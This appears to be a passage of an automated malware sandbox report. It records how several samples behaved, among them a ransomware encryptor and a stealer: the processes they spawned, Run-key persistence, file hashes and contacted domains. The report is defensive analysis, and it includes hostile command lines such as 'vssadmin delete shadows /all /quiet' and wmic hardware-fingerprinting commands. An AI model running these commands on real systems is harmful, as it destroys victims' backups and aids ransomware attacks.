N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ExtraTools.exe

"C:\Users\Admin\AppData\Local\Temp\ExtraTools.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B838.tmp\ExtraTools.bat "C:\Users\Admin\AppData\Local\Temp\ExtraTools.exe""

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\B838.tmp\ErOne.vbs"

C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe

chrst.exe

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\B838.tmp\ExtraTools.bat

MD5 8f07fa594d84c6e234b336def0b47cdc
SHA1 34b88980635c3f2367af03caedc01d50b5e4624a
SHA256 dd79d7a80a9087e1fced76ade08394843eab01a8ce263dc2306f46435b451f77
SHA512 c33fd26b5399771f4bf9877d717bb730a8101b9f6bd24847084c50b066db7f6e43d56cbf44792eedc94d117c50a988f5d4a46127a34a2115c50fbb4a67ed2047

C:\Users\Admin\AppData\Local\Temp\B838.tmp\ErOne.vbs

MD5 a764fe63c6cc48c851f0d2a8ba73c2b7
SHA1 e16351bd38ebcac7e182905767f9b36e078fb5d5
SHA256 8c4d90a5343cea107fad96e842404522aadfc416e7cf84adc58fe2ba72bbc919
SHA512 b0a93898c66c2ff97f9d8cb1f75364a6c4a0ad5cf3158815f94ffb900796065c8e0d384b392d59bf2b01419adb8c65d2dc846ddebaaea971d64c3300edc63571

C:\Users\Admin\AppData\Local\Temp\B838.tmp\firefox32.exe

MD5 866604f3adb9207e29505012215f203f
SHA1 718b342c3bc42f3e73c4014c2b105c4d467b0ba6
SHA256 978ed9b9c86653e8f10feb9e7f93eb32f2dadeec42ccce498403e96b7bb3e3c9
SHA512 cdcdd94e2a4c550a819a28085fe543ed944da298da1409ed111380fbde89f6976a4c7d040750307579b007b4551aa86182d453408436bd7aef35423c49b60f79

C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe

MD5 c657daf595b5d535ccc757ad837eebe8
SHA1 894e953e86e54a830a14fac94e57569d184a9c09
SHA256 a02565ec78fa1221433e720bd57b044938345b8c65a73143bd9ff73529767526
SHA512 21a26bc146dd2a915c17b268b13edc565e9a582d11c1714d89741f4156a880dfe35415d4920a6326d164519f4b28b6371ef9c7bfdb5e19080448bd77b4a20a4b

memory/2640-44-0x000000007428E000-0x000000007428F000-memory.dmp

memory/2640-45-0x0000000000140000-0x0000000000168000-memory.dmp

memory/2640-46-0x000000007428E000-0x000000007428F000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240708-en

Max time kernel

377s

Max time network

377s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\bgckojpgggmcgnt = "C:\\ProgramData\\sungxqekykzeawigkuxf.exe" C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\bgckojpgggmcgnt = "C:\\ProgramData\\sungxqekykzeawigkuxf.exe" C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\bgckojpgggmcgnt = "C:\\Windows\\sungxqekykzeawigkuxf.exe" C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\bgckojpgggmcgnt = "C:\\Windows\\sungxqekykzeawigkuxf.exe" C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\sungxqekykzeawigkuxf.exe C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A
File opened for modification C:\Windows\sungxqekykzeawigkuxf.exe C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe

"C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 trybesmart.in udp

Files

C:\ProgramData\dhqiiylrjiashxnahpkvmwffwzdhxjak

MD5 5643e2590826d85cd09f97dd6a8ec012
SHA1 9424646c927693cc2d8b2d3ac21622f015fe1ed2
SHA256 fc9fbae8e11bd7c664a3a4203303fe43125e72db0d7c8d68d36a244e3293066d
SHA512 3ee054843470d3bb0b330d4b4dd07996195da1cbb131eec2125c2dbd6ab6576c2bf202af279c6432a4cfb2d3c623af7ce5205c567c94d096c1828068c31fe7d6

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20241010-en

Max time kernel

314s

Max time network

320s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\eaa857c95fca38ca08411b757f4ad2a841cfb9782deca8abf64aada445923c0d_Stealer.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\eaa857c95fca38ca08411b757f4ad2a841cfb9782deca8abf64aada445923c0d_Stealer.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20240903-en

Max time kernel

599s

Max time network

600s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Reads user/profile data of web browsers

spyware stealer

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1076 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2408 wrote to memory of 1424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2408 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1076 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2732 wrote to memory of 2928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1076 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2636 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1076 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1496 wrote to memory of 2144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1496 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe

"C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet && exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wmic logicaldisk where drivetype=2 get deviceid | findstr . > %tmp%\y

C:\Windows\SysWOW64\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic logicaldisk where drivetype=2 get deviceid

C:\Windows\SysWOW64\findstr.exe

findstr .

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wmic logicaldisk where drivetype=3 get deviceid | findstr . > %tmp%\y

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic logicaldisk where drivetype=3 get deviceid

C:\Windows\SysWOW64\findstr.exe

findstr .

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wmic logicaldisk where drivetype=4 get deviceid | findstr . > %tmp%\y

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic logicaldisk where drivetype=4 get deviceid

C:\Windows\SysWOW64\findstr.exe

findstr .

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wmic path win32_physicalmedia get SerialNumber | findstr . > %tmp%\y && wmic cpu get ProcessorId | findstr . >> %tmp%\y && wmic path win32_BASEBOARD get Product | findstr . >> %tmp%\y

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic path win32_physicalmedia get SerialNumber

C:\Windows\SysWOW64\findstr.exe

findstr .

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic cpu get ProcessorId

C:\Windows\SysWOW64\findstr.exe

findstr .

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic path win32_BASEBOARD get Product

C:\Windows\SysWOW64\findstr.exe

findstr .

Network

Country Destination Domain Proto
US 8.8.8.8:53 torproject.ip-connect.vn.ua udp
UA 91.236.251.35:80 torproject.ip-connect.vn.ua tcp

Files

C:\Users\Admin\AppData\Local\Temp\y

MD5 730a1c06f8273df68828bbebb3e1fab0
SHA1 1c269bdd515ca992df2c07c2b4c0eda26f1a6c91
SHA256 da51411ba8d69f112382c4ada4c02ad9e5ab3fcececca4bd50bb11122e473679
SHA512 1d56e0d3704d75dff9f20347ff3e712c114a1d9e5383e6356a71a9705dd4a3bb311c174c6d026cc60707abc56f7bfda011293a8dbd7f79a299fb712d3ad33f30

C:\Users\Admin\AppData\Local\Temp\y

MD5 445e94a8ece8238758d3a897fef6822b
SHA1 2c5e5cb3ce480d98d74fe5a0ed23d31848ebb407
SHA256 543e763d191bc04c5564cf6521eeff6c154b74415575303c72b46f32bd24594b
SHA512 c6347eb9214eab5b8e2f61358153244203480c11d4d83f83e1e37cdd3f922a6e50c5568618fb27cb2a70487d7b9bea44614a065631934fca5894a6daec1f82a6

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20240903-en

Max time kernel

359s

Max time network

361s

Command Line

"C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\drivers\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\69srkdAG47tGigR4 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe\" /SkipReg" C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_modules.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_neutral_7a5f47d3150cc0eb\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\HomeBasicE\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ksfilter.inf_amd64_neutral_86311fdf78a07678\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmsun2.inf_amd64_neutral_242c76ad2e288fb4\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\netk57a.inf_amd64_neutral_8b26ad5d0cc037a9\netk57a.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_execution_policies.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_data_sections.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\atiilhag.inf_amd64_neutral_0a660e899f5038a2\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\netl1e64.inf_amd64_neutral_22118b1072f57433\netl1e64.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_remote.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp003.inf_amd64_neutral_4480210763997eb4\Amd64\hpd5300t.exp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\Licenses\eval\StarterN\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\blbdrive.inf_amd64_neutral_1aa816fe7dc98c3f\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnod002.inf_amd64_neutral_a10c656b6c7c053c\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wiaep002.inf_amd64_neutral_0a982dec66379cb0\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\eval\UltimateE\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnky307.inf_amd64_ja-jp_e40bd14f18e8ff7d\prnky307.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_If.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_transactions.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\lsi_fc.inf_amd64_neutral_a7088f3644ca646a\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmagm64.inf_amd64_neutral_ef322a8cc2738a9b\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\Ultimate\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\mdmke.inf_amd64_neutral_3e4daa83122b1559\mdmke.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_data_sections.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_try_catch_finally.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\mdmnis3t.inf_amd64_neutral_857ff0fa9c73850a\mdmnis3t.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_command_precedence.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_eventlogs.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ph3xibc0.inf_amd64_neutral_c24bcc939e6dfc23\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wiaca00a.inf_amd64_neutral_163313056d8f34ab\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnbr005.inf_amd64_neutral_9e4cc05e0d4bcb33\prnbr005.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WCN\de-DE\Add_a_device_or_computer_to_a_network_usb.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_Automatic_Variables.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\brmfcmf.inf_amd64_neutral_67b5984f8e8ff717\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\cxraptor_philipstuv1236d_ibv64.inf_amd64_neutral_b6a3e57df5bad299\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_neutral_0383c5de75359695\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\OEM\Enterprise\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\UltimateE\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp005.inf_amd64_neutral_914d6c300207814f\Amd64\hp6500nt.cfg C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_remote_troubleshooting.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmnis3t.inf_amd64_neutral_857ff0fa9c73850a\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
